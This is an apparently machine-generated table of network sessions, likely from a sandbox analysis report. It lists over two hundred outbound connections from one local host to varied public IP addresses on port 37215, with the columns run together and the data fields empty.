                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4121192.168.2.23446288.36.18.21437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4122192.168.2.235849441.208.172.23437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4123192.168.2.2358702157.16.231.9537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4124192.168.2.2342296173.128.57.1837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4125192.168.2.2333766157.176.81.037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4126192.168.2.2350156197.81.40.16337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4127192.168.2.235747227.16.2.8737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4128192.168.2.234937241.148.203.22137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4129192.168.2.2345130197.167.76.8937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4130192.168.2.234505865.3.85.21637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4131192.168.2.236010073.160.23.12937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4132192.168.2.233605641.29.146.17937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4133192.168.2.235737241.191.121.17337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4134192.168.2.2350532157.172.66.2437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4135192.168.2.2350980197.114.145.13037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4136192.168.2.2343446117.68.216.4037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4137192.168.2.234040041.128.69.5337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4138192.168.2.235146441.143.241.15037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4139192.168.2.233716241.179.167.4637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4140192.168.2.233893041.234.194.15137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4141192.168.2.234312241.68.2.13737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4142192.168.2.2360730197.236.197.15037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4143192.168.2.2347260197.224.149.8237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4144192.168.2.235057641.194.200.6937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4145192.168.2.2357886197.239.50.1137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4146192.168.2.2349758197.236.167.1337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4147192.168.2.234203072.240.13.1337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4148192.168.2.2353946197.80.107.24237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4149192.168.2.233805041.236.139.20537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4150192.168.2.234296093.32.213.1837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4151192.168.2.2353276157.145.111.137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4152192.168.2.23436845.100.229.5037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4153192.168.2.2344790189.151.5.8637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4154192.168.2.235492248.127.146.6837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4155192.168.2.2350642173.49.114.21737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4156192.168.2.234288654.158.232.24937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4157192.168.2.233934241.176.148.17837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4158192.168.2.2348496157.31.210.22337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4159192.168.2.235079841.152.74.25437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4160192.168.2.235182841.6.11.25337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4161192.168.2.2355490157.224.156.21337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4162192.168.2.2335554157.129.196.22737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4163192.168.2.2336902197.190.211.23437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4164192.168.2.233943613.112.248.10037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4165192.168.2.2352494157.175.161.5537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4166192.168.2.2349284157.7.119.6337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4167192.168.2.2360300157.241.175.6637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4168192.168.2.235093041.128.104.21937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4169192.168.2.234882441.156.68.14637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4170192.168.2.233889641.219.142.19537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4171192.168.2.2343130154.241.98.1937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4172192.168.2.2360578157.50.86.7837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4173192.168.2.233980441.70.168.3037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4174192.168.2.2360948145.23.46.8637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4175192.168.2.2356596188.89.155.15037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4176192.168.2.235542288.196.189.1537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4177192.168.2.235340841.138.226.15437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4178192.168.2.235726641.185.113.14637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4179192.168.2.235171841.86.105.17037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4180192.168.2.234927893.127.162.24837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4181192.168.2.2344416197.254.16.2437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4182192.168.2.2346670157.28.215.20937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4183192.168.2.234172014.122.191.19137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4184192.168.2.234582241.161.43.1237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4185192.168.2.2343432197.72.42.24337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4186192.168.2.2346424157.244.171.19337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4187192.168.2.2335666197.223.249.15837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4188192.168.2.2344072197.125.222.10137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4189192.168.2.2353268157.26.125.4637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4190192.168.2.2335498113.144.212.17737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4191192.168.2.234585041.195.46.15337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4192192.168.2.2354886197.254.111.19437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4193192.168.2.2357150197.175.147.7037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4194192.168.2.2355812157.175.227.10637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4195192.168.2.234484441.192.64.20437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4196192.168.2.2336812197.218.1.8237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4197192.168.2.2337940197.230.54.937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4198192.168.2.2353216204.105.252.22937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4199192.168.2.2354744197.119.60.3237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4200192.168.2.2350130197.168.214.237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4201192.168.2.233277681.120.246.6237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4202192.168.2.2340604130.25.33.23537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4203192.168.2.2347340197.194.27.6437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4204192.168.2.2339248120.74.120.19837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4205192.168.2.235979441.232.180.8137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4206192.168.2.235231241.233.233.6937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4207192.168.2.233758294.152.133.8737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4208192.168.2.2354158157.83.231.8237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4209192.168.2.235581241.14.176.17137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4210192.168.2.2354604157.155.185.1737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4211192.168.2.2357708157.16.94.20737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4212192.168.2.2354832138.94.184.2737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4213192.168.2.2336744197.67.178.637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4214192.168.2.2334602104.71.232.20037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4215192.168.2.2351176197.47.95.23037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4216192.168.2.2358142123.170.182.21637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4217192.168.2.2352620197.152.183.10137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4218192.168.2.2355674157.129.202.2737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4219192.168.2.2338534162.161.226.2037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4220192.168.2.2333360197.86.137.12737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4221192.168.2.2344038197.95.176.7137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4222192.168.2.2341706157.58.156.15837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4223192.168.2.2346846157.11.124.9737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4224192.168.2.2344916157.165.188.2937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4225192.168.2.234373441.230.74.2737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4226192.168.2.2346770197.42.126.21737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4227192.168.2.2350504161.175.136.23337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4228192.168.2.2335458187.190.201.18337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4229192.168.2.235852041.52.37.21337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4230192.168.2.2342712197.228.63.21437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4231192.168.2.2353516115.34.228.4237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4232192.168.2.234778041.158.177.24037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4233192.168.2.2343006174.91.163.18537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4234192.168.2.233885441.138.233.8237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4235192.168.2.2336480100.153.37.2337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4236192.168.2.2347746181.28.29.19337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4237192.168.2.234254057.232.5.5337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4238192.168.2.2353860197.231.17.15437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4239192.168.2.2341844174.88.89.15637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4240192.168.2.234720441.205.161.737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4241192.168.2.234962262.234.187.1337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4242192.168.2.234040241.76.86.20237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4243192.168.2.2340524157.126.2.2737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4244192.168.2.234994482.30.242.19137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4245192.168.2.2352596197.142.234.6737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4246192.168.2.234016241.92.135.10537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4247192.168.2.234084413.110.24.24637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4248192.168.2.2339534196.225.117.22037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4249192.168.2.233457041.72.226.17237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4250192.168.2.235374264.22.95.20237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4251192.168.2.235705241.134.19.21237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4252192.168.2.234718441.169.65.9737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4253192.168.2.2336796157.202.225.9637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4254192.168.2.234613247.47.83.6337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4255192.168.2.235233041.106.67.4437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4256192.168.2.233388425.14.254.20737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4257192.168.2.235036035.86.233.9737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4258192.168.2.2360090205.131.14.6737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4259192.168.2.235065441.43.112.3537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4260192.168.2.2352260197.140.2.24637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4261192.168.2.2353630169.81.245.22537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4262192.168.2.235501641.254.167.7737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4263192.168.2.2345938171.110.32.13337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4264192.168.2.236090041.194.83.11437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4265192.168.2.2342906197.100.199.3737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4266192.168.2.2352694197.89.36.17937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4267192.168.2.235307241.68.114.10637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4268192.168.2.2345652157.237.230.6337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4269192.168.2.2333440157.170.180.637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4270192.168.2.236065641.242.61.22037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4271192.168.2.2335424197.174.41.24637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4272192.168.2.235685635.111.122.17337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4273192.168.2.2339028197.62.129.19637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4274192.168.2.234238641.28.142.23037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4275192.168.2.2347882157.162.217.8937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4276192.168.2.234315241.244.33.8637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4277192.168.2.235022436.175.202.537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4278192.168.2.2351822197.32.140.15337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4279192.168.2.2353080197.5.255.6537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4280192.168.2.235951641.155.128.16237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4281192.168.2.233810688.135.80.22137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4282192.168.2.236005841.117.34.14237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4283192.168.2.234457041.3.152.17937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4284192.168.2.235170641.89.121.17737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4285192.168.2.2344634157.7.80.19737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4286192.168.2.234209241.170.2.17837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4287192.168.2.2354166158.251.187.17637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4288192.168.2.2334736157.83.214.15137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4289192.168.2.2357106122.235.156.24837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4290192.168.2.2338006113.186.20.18737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4291192.168.2.2355522197.155.252.16337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4292192.168.2.235378841.147.21.12637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4293192.168.2.235532241.150.134.15637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4294192.168.2.2348206157.24.81.5137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4295192.168.2.236061851.156.1.5237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4296192.168.2.2335262197.42.206.837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4297192.168.2.2345498157.152.241.19437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4298192.168.2.2345674197.202.9.11137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4299192.168.2.234614641.85.126.19537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4300192.168.2.2343878201.247.33.737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4301192.168.2.234431641.103.244.4237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4302192.168.2.2338364197.16.220.2237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4303192.168.2.2352294122.52.118.12837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4304192.168.2.2359010197.225.216.9637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4305192.168.2.235731241.152.130.337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4306192.168.2.2344582197.122.197.16837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4307192.168.2.233680041.43.179.3437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4308192.168.2.234967841.126.136.7637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4309192.168.2.235303041.119.125.15937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4310192.168.2.2360640184.131.125.9537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4311192.168.2.2348520197.232.54.17237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4312192.168.2.2345988194.15.118.22437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4313192.168.2.2337422157.29.47.24937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4314192.168.2.234059841.152.222.24737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4315192.168.2.234196897.65.90.22837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4316192.168.2.2342510197.103.69.14537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4317192.168.2.235134058.106.115.11037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4318192.168.2.2336902197.195.0.11437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4319192.168.2.234333841.162.159.18937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4320192.168.2.2340486115.0.198.23837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4321192.168.2.2340596197.159.236.24137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4322192.168.2.2348930157.86.3.4537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4323192.168.2.2334280197.245.186.3037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4324192.168.2.2352382197.203.154.237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4325192.168.2.2342636197.120.153.23037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4326192.168.2.235066241.99.224.18037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4327192.168.2.2333592157.20.127.25537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4328192.168.2.2339940197.171.112.16137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4329192.168.2.2352496193.72.182.7837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4330192.168.2.235868641.34.182.4637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4331192.168.2.2357030197.220.36.6837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4332192.168.2.2346436197.50.36.6837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4333192.168.2.235737638.17.217.7337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4334192.168.2.236044641.8.73.10137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4335192.168.2.2355804157.46.156.7137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4336192.168.2.2337562157.103.168.18937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4337192.168.2.2346552157.174.37.20237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4338192.168.2.234278241.105.57.8737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
